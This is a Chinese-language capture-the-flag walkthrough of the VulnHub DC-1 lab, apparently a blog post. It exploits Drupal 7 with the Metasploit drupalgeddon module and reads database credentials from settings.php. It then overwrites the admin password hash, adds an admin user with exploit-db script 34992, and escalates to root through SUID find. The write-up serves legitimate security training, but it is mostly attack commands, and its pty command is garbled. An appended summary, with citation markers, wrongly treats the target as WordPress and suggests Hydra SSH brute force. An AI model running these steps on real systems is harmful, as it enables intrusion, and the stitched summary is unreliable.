Vulnhub-DC-1

配置信息:
靶机下载地址:https://www.vulnhub.com/entry/dc-1,292/
靶机:DC1 (VirtualBox)    IP:192.168.67.200
攻机:Kali  (Local)             IP:192.168.67.109

目标:获取5个flag

开始游戏:

nmap -sn 192.168.67.0/24

获取目标IP地址:192.168.67.200

扫描目标信息:

nmap -A -p- 192.168.67.200

获取目标开放端口:22 [ssh] || 80[http] || 111[rpc]

获取目标系统信息:Linux 3.2 - 3.16

发现开放80端口,因此尝试登录网页,浏览器输入:http://192.168.67.200

左上方发现CMS为Drupal


CMS:Drupal7

Web servers:Apache2.2.22

Programming languages:PHP5.4.45

Operating system:Debian

JavaScript libraries:JQuery1.4.4 jQuery UI1.8.7

使用 wappalyzer 插件确认获取网站相关信息:

注:Wappalyzer是一款能够分析目标网站所采用的平台构架、网站环境、服务器配置环境、JavaScript框架、编程语言等参数的网站技术分析插件


确认 CMS 为 Drupal,利用msfconsole获取meterpreter:(use rank:excellent)

search drupaluse exploit/multi/http/drupal_drupageddonshow optionsset RHOSTS 192.168.67.200exploit

在meterpreter下获取交互式反弹shell:

meterpreter > shellpython -c 'import pty;pyt.spawn("\bin\sh")'$ ls

输入命令 ls 发现有一个 flag1.txt,果断查看它,这就得到了flag1

$lslsCOPYRIGHT.txt       MAINTAINERS.txt  includes     robots.txt  web.configINSTALL.mysql.txt   README.txt       index.php    scripts     xmlrpc.phpINSTALL.pgsql.txt   UPGRADE.txt      install.php  sitesINSTALL.sqlite.txt  authorize.php    misc         themesINSTALL.txt         cron.php         modules      update.phpLICENSE.txt         flag1.txt        profiles     user$cat flag1.txtcat flag1.txtEvery good CMS needs a config file - and so do you

每一个好的 CMS 都需要一个配置文件,你也如此。

根据falg1的提示,利用搜索引擎查询Drupal的配置文件?

得到一个地址:/sites/default/settings.php —— 利用 more 查看全部信息

获取 flag2,这就得到了第二个 flag2

$more sites/default/settings.phpmore sites/default/settings.php<?php/** * * flag2 * Brute force and dictionary attacks aren't the * only ways to gain access (and you WILL need access). * What can you do with these credentials? * */

暴力破解和字典攻击并不是取得访问权限的唯一方式(你需要访问权限),利用这些凭证你能做什么?

这是 flag2 给我们留下的信息,再回看该配置文件,会发现这里有关于数据库的详细信息:

$databases = array (  'default' =>   array (    'default' =>     array (      'database' => 'drupaldb',      'username' => 'dbuser',      'password' => 'R0ck3t',      'host' => 'localhost',      'port' => '',      'driver' => 'mysql',      'prefix' => '',    ),

尝试进入 mysql :

$ mysql -h localhost -u dbuser -pmysql -h localhost -u dbuser -pEnter password: R0ck3t

 

show databases;use drupaldb;show tables;select * from users;

查询有哪些表时,可以很明显的看到有 users 这个表,果断 select 一发再说

这就得到了用户名和一串奇奇怪怪的密码,再次利用搜索引擎,可搜索:drupal7忘记密码怎么办?drupal7如何重置密码?drupal7如何修改密码?类似这些问题,让开发者或研究人士告诉我们答案

还真告诉了,直接重置管理员密码登录。

exit$ls$php ./scripts/password-hash.sh 123456mysql -h localhost -u dbuser -pEnter password:R0ck3tuse drupaldb;update users set pass='$S$DQZsZLqxCbnNCRuvOFCQBC2snsbkjGrH3Xw4nqxxhuYIONkuC4dP' where name='admin';

登录成功


有时直接修改太过明目张胆,那么有没有较隐蔽的方法呢?有什么比较隐蔽的方法能够也是以管理员的身份去登录的呢?要不试试添加一个管理员帐号?

首先得知道版本号,看能否利用,一般在modules/system/system.info可以看到版本号,如果不知道,利用搜索引擎也可得知这一信息:

cat modules/system/system.info

得到该Drupal的版本为7.24

在kali上查询是否存在添加管理员漏洞可利用:

searchexploit drupal

发现有 Add Admin User 可以利用且版本符合条件

copy一份到家目录下,随后添加一个具有管理员权限的账户

cp /usr/share/exploitdb/exploits/php/webapps/34992.py /root/34992.pycd ~python 34992.py -hpython 34992.py -t http://192.168.67.200 -u whoami -p 123456

登录成功


随后浏览页面[每个按钮都去点],看有无新发现,在find content找到了flag3

点击 flag3,可以获得flag3详细信息:

特殊的PERMS可以帮助找到密码-但您需要-exec该命令来隐藏的内容。

很明显的提示:find+perms+exec 命令用来提权

首先利用 find 命令查看有哪些 suid 命令:

find / -perm -4000

利用 find 提权,find 提权有两种方式:


/*这是第一种*/find ./ acce -exec '/bin/sh' \;


/*这是第二种*/touch bccefind bcce -exec '/bin/sh' \;


这就拿到了 root 权限,查找有无flag4

可以发现 flag4 是一个用户...

find / -name "flag4cd /home/flag4cat flag4.txt

你能利用同样的方法用root权限找到或访问到flag吗?

貌似我们已经进入了root环境下,竟然flag4在家母录下,那么flag5会不会在root目录下?

—— 找到 flag5:thefinalflag

游戏结束


总结:

0:MSF 漏洞模块利用

1:配置文件

2:搜索引擎的合理应用

3:提权

### VulnHub DC-1 靶机 攻略 介绍 #### 下载地址 VulnHub是一个提供各种虚拟机镜像用于安全测试和学习渗透测试技巧的平台。对于DC-1靶机,可以在[VulnHub官网](https://www.vulnhub.com/)搜索并下载该靶机镜像文件。 #### 初始信息收集 在启动DC-1之后,通过网络扫描工具如`nmap`来发现开放端口和服务版本是非常重要的初步操作[^2]。这有助于了解目标系统的潜在弱点所在之处。 ```bash nmap -A <target_ip> ``` #### Web应用漏洞探测 一旦确认存在Web服务运行于特定IP地址之上,则可以采用专门针对WordPress站点的安全评估工具WPScan来进行进一步的信息挖掘工作: ```bash wpscan --url http://<target_ip>/wordpress/ ``` 此命令能够帮助识别可能存在的插件或主题中的已知漏洞,并尝试获取管理员用户名列表等有用情报[^1]。 #### 获取初始访问权限 当已经掌握了某些关于网站后台管理账号线索后(比如默认用户名),可借助Hydra这样的暴力破解程序配合常用密码字典对登录界面发起攻击以期获得合法凭证进入内部环境: ```bash hydra -L /usr/share/wordlists/usernames.txt -P /usr/share/wordlists/passwords.txt ssh://<target_ip> ``` 这里假设SSH服务对外开放并且允许远程登陆;实际过程中还需根据具体情况调整相应参数设置[^3]。 #### 提升权限至root级别 成功创建Meterpreter会话意味着获得了较为深入的目标主机控制权,在此基础上继续探索其他未授权区域直至找到可用于提升当前用户权限的方法。例如,如果遇到弱配置下的Sudoers文件或是设置了简单密码的辅助账户,都可以成为突破口之一[^5]: ```bash sudo -l # 查看是否有无需密码即可执行高权限指令的情况 whoami # 确认当前身份 su admin # 尝试切换到更高权限用户 ``` 以上就是有关如何攻克VulnHub平台上名为DC-1这一挑战性实验项目的概览描述以及部分关键技术要点提示。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值